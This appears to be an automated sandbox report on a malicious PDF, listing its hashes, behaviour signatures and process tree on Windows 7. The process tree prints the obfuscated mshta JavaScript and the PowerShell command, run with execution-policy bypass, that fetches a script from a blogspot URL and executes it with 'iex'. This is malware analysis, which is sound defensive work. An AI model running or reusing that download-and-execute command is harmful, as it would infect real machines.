Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17/03/2025, 11:42
Behavioral task
behavioral1
Sample
1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903.pdf
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903.pdf
Resource
win10v2004-20250314-en
General
-
Target
1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903.pdf
-
Size
39KB
-
MD5
b77cf9ae7bea425d8a5d42eacee9d226
-
SHA1
ee9c30b16aee8039e681b26c5d6297be6497c723
-
SHA256
1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903
-
SHA512
8ddab66e3a4259d1900016267f71f0bb727b6304c7ece1d4529cfd32eb55f25d013dd839828e86829b4d029741331e674e612e3051430481a4b631914018f26a
-
SSDEEP
384:PXwVVcX8YbmWG3cdW0nwcP3r+8cQe1nva3:/xMYbWWjPCTQe1i3
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2200 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1712 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2200 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1712 AcroRd32.exe 1712 AcroRd32.exe 1712 AcroRd32.exe 1712 AcroRd32.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1712 wrote to memory of 1580 1712 AcroRd32.exe 31 PID 1712 wrote to memory of 1580 1712 AcroRd32.exe 31 PID 1712 wrote to memory of 1580 1712 AcroRd32.exe 31 PID 1712 wrote to memory of 1580 1712 AcroRd32.exe 31 PID 1580 wrote to memory of 2200 1580 mshta.exe 32 PID 1580 wrote to memory of 2200 1580 mshta.exe 32 PID 1580 wrote to memory of 2200 1580 mshta.exe 32 PID 1580 wrote to memory of 2200 1580 mshta.exe 32
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903.pdf"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:var Ifw = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm ht' + 't' + 'ps://' + 'marchlkalanew6' + '.b' + 'l' + 'og' + 'spot.c' + 'om' + '/lundchikha.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], def = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ghi = new ActiveXObject(Ifw[0]); ghi[Ifw[1]](Ifw[2], Ifw[3], Ifw[4], Ifw[5], Ifw[6]);close()"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://marchlkalanew6.blogspot.com/lundchikha.doc) | . iex;Start-Sleep -Seconds 7;3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57df32f061b4e336929b56da29e4d167b
SHA16236dc6311134dbad6bc29c69d132b76ab111e79
SHA2569572dc3b16b6b94b6e02ca1c8f9c5e8b5d86e8d1cdc2bdf40b39127436393f49
SHA51271dd951879eed5e687f2d7f67fff6f7c404d1b77ec79ac393180cdc1a5f8e93773a40adddef759d1cb7136dd8aa7cfca4a287fbff352e0bd8c46f48dc3b1d7e0